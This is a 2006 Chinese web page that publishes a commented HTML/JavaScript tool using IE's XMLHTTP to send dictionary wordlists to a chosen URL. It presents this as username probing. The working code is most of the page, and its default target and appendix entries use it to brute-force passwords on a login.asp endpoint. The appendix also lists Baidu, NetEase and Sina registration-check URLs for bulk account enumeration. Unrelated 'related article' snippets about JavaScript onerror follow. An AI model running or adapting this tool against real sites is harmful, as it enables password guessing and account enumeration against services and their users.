javascript字典探测用户名工具
<html>
<head>
<style>
body { font-size: 10pt; background-color:#D4D0C8 }
td { font-size: 9pt }
</style>
</head>
<script language="javascript">
/*
程序标题:javascript字典探测用户名工具
发布时间:2006年8月
文章作者:翟振凯 (小琦)
作者网站:http://www.xiaoqi.net
作者论坛:http://www.tdqy.com
演示地址:http://www.xiaoqi.net/zuopin/js_user_swf.htm
QQ:22336848 53353866
关于本文:
授人予鱼,不如授人予渔。本程序的核心代码处,都有详细的注解,
目地是让大家了解一个程序的开发过程和这个程序功能的实现原理,
而不仅仅是给大家提供一个这样的工具。希望看过本文后的朋友会有
所收获,能和我共同分享用javascript编写程序的乐趣。
*/
//尝试用IE浏览器的方式创建XMLHttpRequest对象
var xmlhttp = null;
try
{
xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
}
catch(e)
{
try
{
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e){
alert("您的浏览器不能创建XMLHttpRequest对象,无法使用此程序!");
}
}
//尝试用IE浏览器的方式创建XMLHttpRequest对象结束
/*
翟振凯注:MSXML2.XMLHTTP 和 Microsoft.XMLHTTP 都是微软的XMLHTTP控件,只是版本不同。
IE的安全级别如果不是太高,微软的XMLHTTP控件是可以跨域获取数据的。
因为 Mozilla Firefox 浏览器的 XMLHttpRequest() 不能跨域获取数据,我们就不用 XMLHttpRequest() 方法创建XMLHTTP对象了。
*/
//对返回的中文编码处理 作者:翟振凯
function Rec_Html(Html)
{
var Rec=new ActiveXObject("ADODB.RecordSet");
Rec.Fields.Append("xiaoqi",201,1);
Rec.Open();
Rec.AddNew();
Rec(0).AppendChunk(Html);
Rec.Update();
return Rec(0).Value;
Rec.Close();
}
//对返回的中文编码处理结束
//开始探测 参数为要探测的当前值
function geturl(id)
{
try{
xmlhttp.open("GET",url.value+id,false);//定义数据传送方式,服务网页的URL(探测地址+探测值),是否同步执行
xmlhttp.onreadystatechange = function() {//xmlhttp 触发事件
if(xmlhttp.readyState==4)//xmlhttp对象状态如果为完成
{
if(xmlhttp.status==200) //如果服务器返回的状态码为200(成功)
{
//对结果的中文编码转换判断
if(err.value.replace(/[^\W]/g,'').length=0)
/*关于转换判断的注:
例如:"翟振凯".replace(/[^\W]/g,'').length 返回结果 3
"翟振凯22336848".replace(/[^\W]/g,'').length 返回结果 3
"xiaoqi22336848".replace(/[^\W]/g,'').length 返回结果 0
"小琦22336848".replace(/[^\W]/g,'').length 返回结果 2
replace(/[^\W]/g,'')的功能是把字符串里的英文和数字都清除掉。
*/
{
Html=xmlhttp.responseText;//不转换
}
else
{
Html=Rec_Html(xmlhttp.responseBody);//转换
}
//对结果的中文编码转换判断结束
// 根据判断依据区分可用或不可用的值!
if(Html.indexOf(err.value,0)<0)
{
x_1.innerHTML=x_1.innerHTML+"<nobr> "+id;//输出可用值
}
else
{
x_2.innerHTML=x_2.innerHTML+"<nobr> "+id;//输出不可用值
}
// 根据判断依据区分可用或不可用的值!
}
}
}
xmlhttp.send();
}
catch(e)
{
x_2.innerHTML=x_2.innerHTML+"<nobr> "+id+"超时!";//输出异常或超时的值。
}
}
//开始探测结束
//载入本地字典文件,并把内容定义为数组
function kaishi(){
fileFullPath=dic_url.value;
xmlhttp.open("GET",fileFullPath,false);//载入字典文件方法
xmlhttp.send();
Html=Rec_Html(xmlhttp.responseBody);//中文编码转换
dic=Html.split('\r\n');//以换行符将载入的字典内容转换为数组
sl.value=dic.length;//告诉用户要探测的次数(数组大小)
xunhuan()//成功载入后开始循环探测。
}
//载入本地字典文件,并把内容定义为数组结束
//循环探测
function xunhuan()
{
bar=parseInt(jd.value);//将进度值转换为整数
if(bar<sl.value)//判断是否探测完
{
for(i=0;i<parseInt(jc.value);i++){//设定探测线程
geturl(dic[bar+i]);//从数组内取值进行探测
}
jd.value=bar+parseInt(jc.value);//累加探测进度,并向用户呈现当前进度
setTimeout("xunhuan()",parseInt(hc.value*1000));//根据缓冲时间来进行重复循环探测
}
else//如果进度不小于要探测的次数,就向用户返回探测完成的结果。
{
alert("探测完成!");
}
}
//循环探测结束
//暂停探测函数
function pause(obj)
{
if(obj.value=='暂停')
{
obj.temp=hc.value;//记忆原来的缓冲时间。
hc.value=5000;//将缓冲时间设置为5000秒,这个值自己可以修改。
obj.value='继续';//改变按钮显示状态
}
else
{
hc.value=obj.temp;//提取原来的缓冲时间。
obj.value='暂停';//改变按钮显示状态
kaishi()//继续探测
}
}
//暂停探测函数结束
function ck()//单个值探测验证检查
{
if (url.value.length<5){alert('请输入要探测地址!');return};
if (id_one.value.length<1){alert('请输入要探测的值!');return};
geturl(id_one.value)
}
function ck1()//批量值探测验证检查
{
if (url.value.length<5){alert("请输入要探测地址!");return}
if (err.value.length<1){alert("请输入不可用标记!");return}
if (dic_url.value.length<5){alert("请先选择字典文件!");return}
jd.value=0;
kaishi()
}
</script>
<body>
程序作者:翟振凯 注:如果无法使用,或结果显示超时,请将本页下载到本地计算机上使用。
<fieldset >
<legend>探测设置</legend>
<table border="1" width="100%" bordercolorlight="#E6E6E6" cellspacing="0" bordercolordark="#D4D0C8">
<tr>
<td>探测地址</td>
<td>
<input type="text" id="url" size="63" value="http://www.xiaoqi.net/zuopin/login.asp?username=翟振凯&password="></td>
</tr>
<tr>
<td>失败包涵标记 </td>
<td><input type="text" id="err" size="63" value="不正确"></td>
</tr>
<tr>
<td>测试单个值</td>
<td><input type="text" id="id_one" size="20">
<input type="button" value="探测" onclick="ck();"> </td>
</tr>
<tr>
<td>选择字典文件</td>
<td><input type="file" name="dic_url" size="20" value="">
<input type="button" value="开始" onclick="ck1();">
<input type="button" value="暂停" temp="" onclick="pause(this)">
<input type="button" value="清除可用结果" onclick="x_1.innerHTML=''">
<input type="button" value="清除不可用结果" onclick="x_2.innerHTML=''">
</td>
</tr>
<tr>
<td>高级参数</td>
<td>
每次探测:<input type="text" id="jc" value="1" size="3"> 个
缓冲时间:<input type="text" id="hc" value="0.1" size="3"> 秒
进度:<input type="text" id="jd" value="0" size="12">
探测数量:<input type="text" id="sl" size="13">
</td>
</tr>
</table>
</fieldset>
<fieldset>
<legend>可用值:</legend>
<div style="height:100px;width:100%;overflow:auto;"><span id="x_1"></span></div></fieldset>
<fieldset>
<legend>不可用值:</legend>
<div style="height:100px;width:100%;overflow:auto;"><span id="x_2"></span></div>
</fieldset>
<p>附录:</p>
<table border="1" width="100%" id="table1" cellspacing="0" cellpadding="3">
<tr style="font-weight: bold; background-color: #C0C0C0">
<td width="111">测试字典文件地址</td>
<td width="633" colspan="3"><span style="font-weight: 400">
<font size="3">http://www.xiaoqi.net/zuopin/dic.txt</font></span></td>
</tr>
<tr style="font-weight: bold; background-color: #C0C0C0">
<td width="111">网站名</td>
<td width="435">入口</td>
<td width="83">不可用标记</td>
<td width="105">备注</td>
</tr>
<tr>
<td width="111">百度用户注册</td>
<td width="435">http://passport.baidu.com/?check_username&un=</td>
<td width="83">false</td>
<td width="105"> </td>
</tr>
<tr>
<td width="111">百度空间注册</td>
<td width="435">http://hi.baidu.com/sys/checkurl/item/</td>
<td width="83">false</td>
<td width="105">要先用百度用户登陆</td>
</tr>
<tr>
<td width="111">网易通行证注册</td>
<td width="435">http://reg.163.com/register/checkssn.jsp?username=</td>
<td width="83">对不起</td>
<td width="105"> </td>
</tr>
<tr>
<td width="111">新浪通行证</td>
<td width="435">
<input type="text" size="57" value="http://unipro.sina.com.cn/cgi-bin/t5checkuser0.cgi?encpm=96ad1b22f3b6f5d641980dd7515d40b0779972460aea0f857bfd45c63380c909382087da578a10a278fa840c6cec9cb2c933eace6ef114ae61938a14a2f9fa569f33421b346faae845af2b99a203408ef831de7de17ae6726224b2f89f65efeb089ed08084afb13b8b9232bd10a7ede7fd2a6b3d2181558bef80c3a45976850d&email=&password=&password2=&pwdQ=&pwdA=&sex=&byear=1986&bmonth=01&bday=01&options=&outinstr=&safe_num=&safe_num2=&identityinfo=&identityNum=&checkidentityNum=&ismail=&userid="></td>
<td width="83">登录名被占用</td>
<td width="105"> </td>
</tr>
<tr>
<td width="111">测试网站用户密码暴力破解</td>
<td width="435">
http://www.xiaoqi.net/zuopin/login.asp?username=翟振凯&password=</td>
<td width="83">不正确</td>
<td width="105"> </td>
</tr>
<tr>
<td width="111">测试网站用户密码暴力破解</td>
<td width="435">
http://www.xiaoqi.net/zuopin/login.asp?username=小琦&password=</td>
<td width="83">不正确</td>
<td width="105"> </td>
</tr>
</table>
<input type="hidden" id="dic1" value="ff"><input type="hidden" id="jc_id" value><p>
程序作者:翟振凯 开发日期:2006年8月<br>
作者网站:<a href="http://www.xiaoqi.net">http://www.xiaoqi.net</a><br>
演示地址:<a href="http://www.xiaoqi.net/zuopin/js_user_swf.htm">http://www.xiaoqi.net/zuopin/js_user_swf.htm</a><br>
程序打包下载地址:<a href="http://www.xiaoqi.net/zuopin/js_user.rar">http://www.xiaoqi.net/zuopin/js_user.rar</a><br>
QQ:22336848</p></p>
</body>
</html>
相关推荐
-
JavaScript中的onerror事件概述及使用
1.Window.onerror事件 onerror事件用来协助处理页面中的JavaScript错误.当页面上出现异常时,error事件便在window对象上触发.例如: 在这种情况下,浏览器会显示错误信息: . 如果不希望浏览器在默认对话框中显示出错消息,让onerror方法返回true即可. 此外,onerror方法还提供了三个参数用来确定错误确切的信息,分别是: 1)message:一个字符串,声明了出现的错误的信息(不同的浏览器中返回的消息内容略有差异). 2)url:一个字符串,声明了
-
JS实现点击链接取消跳转效果的方法
复制代码 代码如下: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="author" content="http://www.jb51.net/" /> <title>我们</title> <script type="text/javascript">
-
JS获得URL超链接的参数值实例代码
复制代码 代码如下: var url = location.href; //获取keyword的参数值 var es=/keyword=/; es.exec(url); var result=RegExp.rightContext; 例如: 复制代码 代码如下: var url = location.href; //获取pid的参数值 var es=/pid=/; es.exec(url); var pid=RegExp.rightContext; var aurl = "&pid=&q
-
javascript window.onerror事件学习新收获
在捕获js错误时,我们通常使用try{}catch(e){}的方式,然后通过e.errorMessage等方式获取错误信息然后报告错误.但对于onerror事件可能很少问津,我们是否思考过如何报告错误所在的行号?如果想过这个是否也被这个问题所困扰过,是否认为在js里不可能捕获错误的行号呢?其实本人就遇到上述的几个问题,今日读某人写的一段js代码顿然发现了onerror事件,要说onerror这个时间也是n久以前就知道了,但对于其所带有的三个参数和其特殊性质却一直没有去了解过.经过自己的研究测试,
-
JavaScript探测CSS动画是否已经完成的方法
不啰嗦上代码: WN:(function(){ var el = $('<fakeelement>'), transition="transition", transitionEnd, animEvent={'start':null,'iteration':null,'end':null}, vendorPrefix; transition = transition.charAt(0).toUpperCase() + transition.substr(1); vendor
-
用javascript实现给图片加链接
<script> var strVariable = "<img src='http://www.jb51.net/images/logo.gif'>"; strVariable = strVariable.link("http://www.jb51.net"); document.write(strVariable) </script>
-
用window.onerror捕获并上报Js错误的方法
前两天有个2048游戏的用户反馈说,打开游戏后不能玩儿,只有一个游戏面板,数字无法初始化,更无法移动,设备为iPhone 4S.iOS 5.1.尝试从微信调起Safari打开,依然不好使.由于游戏中运用了比较多的HTML5特性,所以粗略估计是有JS报错导致.不过这样的信息该如何捕获到呢?当然是传说中的window.onerror. 从W3C找到关于window.onerror的方法体介绍: 这个意思,基本可以就是说,window.onerror方法,我们可以写成: /** * @param {S
-
JS对img标签进行优化使用onerror显示默认图像
对于网站图像的不显示有很多原因,网络问题,文件本身问题,文件URL问题等,而当图像加载失败时会触发onerror这个事件,我们利用这点,可以有效的避免图像加载失败的尴尬! js代码 复制代码 代码如下: //图像加载出错时的处理 function errorImg(img) { img.src = "http://static.xuexiba.com/uploadfile//UserInfo/Avatar/201403/1303992393385832875324.jpg"; img.
-
js注意img图片的onerror事件的分析
经过分析,发现网页中存在类似如下的代码: <img src="pic.gif" onerror="javascript:this.src='/noPic.gif';" alt="pic" /> 分析:特别注意 onerror,当图片不存在时,将触发 onerror,而 onerror 中又为 img 指定一个 NoPic.gif 图片.也就是说图片存在则显示 pic.gif,图片不存在将显示 noPic.gif.但问题来了,如果 no
-
JS实现探测网站链接的方法【测试可用】
本文实例讲述了JS实现探测网站链接的方法.分享给大家供大家参考,具体如下: 如果想通过程序探测一个网站链接是否存在,可以通过服务器端高级语言编程实现,其实客户端的JavaScript也是可以探测的,下面通过一个技巧来探测网站链接. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&q
-
js实现点击链接后延迟3秒再跳转的方法
本文实例讲述了js实现点击链接后延迟3秒再跳转的方法.分享给大家供大家参考.具体分析如下: js实现点击链接后延迟3秒再跳转.不管有没有用,咱们反正能实现 使用setTimeout()函数实现跳转延迟 <html> <head> <title> jquery 延迟跳转</title> <meta http-equiv="content-type" content="text/html;charset=utf-8"
-
JavaScript通过使用onerror设置默认图像显示代替alt
JavaScript代码 //图像加载出错时的处理 function errorImg(img) { img.src = "默认图片.jpg"; img.onerror = null; } html代码 <img width="32" height="32" src="1.jpg" onerror="errorImg(this)" /> 为了美观当网页图片不存在时不显示叉叉图片 当在页面显示的时
-
JS使用onerror捕获异常示例
本文实例讲述了JS使用onerror捕获异常的方法.分享给大家供大家参考,具体如下: 如果需要利用 onerror 事件,就必须创建一个处理错误的函数.你可以把这个函数叫作 onerror 事件处理器 (onerror event handler).这个事件处理器使用三个参数来调用:msg(错误消息).url(发生错误的页面的 url).line(发生错误的代码行). <head> <script type="text/javascript"> onerror=